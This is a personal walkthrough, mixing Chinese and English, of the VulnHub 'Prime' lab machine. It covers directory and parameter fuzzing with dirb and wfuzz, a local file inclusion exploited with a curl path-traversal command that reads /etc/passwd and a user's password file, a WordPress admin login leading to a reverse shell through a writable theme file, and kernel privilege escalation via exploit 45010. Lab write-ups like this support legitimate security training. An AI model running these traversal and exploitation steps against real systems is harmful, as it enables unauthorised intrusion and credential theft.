vulnhub-29-prime-ser1 - My-oscp-all-things

ipaddress:192.168.91.131 ### information_gathering open-port:22 80 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609491865941-5a6ddb24-04fa-4d9e-97ec-8eebc7c6cf35.png#align=left&display=inline&height=52&margin=%5Bobject%20Object%5D&name=image.png&originHeight=103&originWidth=623&size=29532&status=done&style=none&width=311.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609522832910-12605d75-4865-42eb-ba0f-fe084f88f36d.png#align=left&display=inline&height=73&margin=%5Bobject%20Object%5D&name=image.png&originHeight=145&originWidth=560&size=37406&status=done&style=none&width=280) ``` http://192.168.91.131/dev http://192.168.91.131/devwordpress ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609522888474-56a18e0e-5445-4e7d-867e-604fc9cf4d51.png#align=left&display=inline&height=152&margin=%5Bobject%20Object%5D&name=image.png&originHeight=303&originWidth=709&size=36059&status=done&style=none&width=354.5) dev里提示我们需要进行爆破猜解 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609492262542-1f1b4202-6264-4b76-bdf8-fd176691fd06.png#align=left&display=inline&height=122&margin=%5Bobject%20Object%5D&name=image.png&originHeight=243&originWidth=1137&size=24277&status=done&style=none&width=568.5) when i use dirb command i find this: ``` dirb http://192.168.91.131 -X .txt ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523023646-c5decef8-7bbb-4944-865e-c038fbc12bfa.png#align=left&display=inline&height=89&margin=%5Bobject%20Object%5D&name=image.png&originHeight=178&originWidth=485&size=28952&status=done&style=none&width=242.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523061175-626174a4-f30e-4fbf-8079-e43af1febfc8.png#align=left&display=inline&height=185&margin=%5Bobject%20Object%5D&name=image.png&originHeight=370&originWidth=652&size=35214&status=done&style=none&width=326) [https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web](https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web) see the location.txt and you will get your next move// so i get the github pages to find someting: ``` COMMNAD = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something COMMAND = wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 --hw 500 http://website-ip/index.php?FUZZ=something ``` ### Establish a foothold okay,接着用wfuzz command 结合location.txt进行fuzz 1.wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hc=404,406,502 --hw=12 [http://192.168.91.131/index.php?FUZZ=testing](http://192.168.91.131/index.php?FUZZ=testing) //找到file参数 2.对file参数输入location.txt ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523301280-12191cf1-dbcf-43ad-a128-3da20c5cc988.png#align=left&display=inline&height=476&margin=%5Bobject%20Object%5D&name=image.png&originHeight=952&originWidth=736&size=283653&status=done&style=none&width=368) 提示找到secrettier360为参数的文件 ``` wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/big.txt --hc=404,406,502 http://192.168.91.131/FUZZ.php?secrettier360=testing //找到image.php存在 ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523464353-baca0744-7269-45ca-8731-b8cc4197ceaa.png#align=left&display=inline&height=52&margin=%5Bobject%20Object%5D&name=image.png&originHeight=104&originWidth=633&size=19529&status=done&style=none&width=316.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523492275-ac592565-700b-4b42-b9d9-fc4a33dcb1ab.png#align=left&display=inline&height=445&margin=%5Bobject%20Object%5D&name=image.png&originHeight=889&originWidth=664&size=272928&status=done&style=none&width=332) ``` http://192.168.91.131/](http://192.168.91.131/image.php?secrettier360=secret ``` 于是在这里发现LFI漏洞，来读取wp-config.php但并未成功，但是注意靶机登陆界面提示为 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523628830-e5a63fb1-18c8-4cb0-80b7-e08106817ccd.png#align=left&display=inline&height=138&margin=%5Bobject%20Object%5D&name=image.png&originHeight=275&originWidth=462&size=86758&status=done&style=none&width=231) 所以用户名为：find password.txt file in my directory，那么我们尝试找到所有存在的用户名，并依次读取是否存在password.txt文件 ``` curl http://192.168.91.131/image.php?secrettier360=../../../etc/passwd | grep /home >user.txt ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495203441-81c7890b-3519-4494-b64d-5c014e8a97c4.png#align=left&display=inline&height=36&margin=%5Bobject%20Object%5D&name=image.png&originHeight=71&originWidth=598&size=20761&status=done&style=none&width=299) 最终在saket下找到了password.txt,密码为follow_the_ippsec [http://192.168.91.131/image.php?secrettier360=../../../home/saket/password.txt](http://192.168.91.131/image.php?secrettier360=../../../home/saket/password.txt) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609523754181-1291a063-feda-4065-b6f4-18b378cefcd6.png#align=left&display=inline&height=479&margin=%5Bobject%20Object%5D&name=image.png&originHeight=958&originWidth=769&size=350205&status=done&style=none&width=384.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609494848175-cc168ec1-aa9a-47ca-add9-c8e812f3c915.png#align=left&display=inline&height=500&margin=%5Bobject%20Object%5D&name=image.png&originHeight=999&originWidth=1899&size=870610&status=done&style=none&width=949.5) so username is admin password is follow_the_ippsec 尝试用saket follow_the_ippsec ssh登陆失败后，从wordpress以admin身份密码为follow_the_ippsec登陆成功，但是并不能直接修改所有主题文件，于是google到了[wordpress/wp-content/themes/twentynineteen/secret.php](http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php)文件存在可写权限，成功反弹shell. ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495329269-9bd6ca72-60ec-4068-94a8-33e5d3d23298.png#align=left&display=inline&height=435&margin=%5Bobject%20Object%5D&name=image.png&originHeight=869&originWidth=1920&size=127667&status=done&style=none&width=960) [http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php](http://192.168.91.131/wordpress/wp-content/themes/twentynineteen/secret.php) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495575987-bb3ec8d6-24c5-4d28-a13e-22990f9a10ee.png#align=left&display=inline&height=62&margin=%5Bobject%20Object%5D&name=image.png&originHeight=124&originWidth=1029&size=15471&status=done&style=none&width=514.5) okay~ ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495777663-ea147342-9d4c-48c3-bcf6-7005664c8786.png#align=left&display=inline&height=101&margin=%5Bobject%20Object%5D&name=image.png&originHeight=202&originWidth=757&size=50154&status=done&style=none&width=378.5) ### 权限提升 ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609495907500-0d8f4bd5-9aee-429a-be07-a626dcbfdcfa.png#align=left&display=inline&height=113&margin=%5Bobject%20Object%5D&name=image.png&originHeight=225&originWidth=564&size=42153&status=done&style=none&width=282) wordpress yourpasswordhere but unuseful~ cat /home/* ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609496035688-a6509703-08a8-42c4-bfb4-ebb905da2415.png#align=left&display=inline&height=48&margin=%5Bobject%20Object%5D&name=image.png&originHeight=95&originWidth=403&size=10753&status=done&style=none&width=201.5) af3c658dcf9d7190da3153519c003456 用les.sh脚本查看后内核提权成功 ``` searchsploit 45010 ``` ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609524276659-e680d908-52b5-4697-974e-57ff8a09a266.png#align=left&display=inline&height=19&margin=%5Bobject%20Object%5D&name=image.png&originHeight=38&originWidth=1199&size=9870&status=done&style=none&width=599.5) ![image.png](https://cdn.nlark.com/yuque/0/2021/png/10362401/1609497718668-30ab4466-ca2b-4022-adbf-c56f426bbfca.png#align=left&display=inline&height=37&margin=%5Bobject%20Object%5D&name=image.png&originHeight=74&originWidth=679&size=10365&status=done&style=none&width=339.5)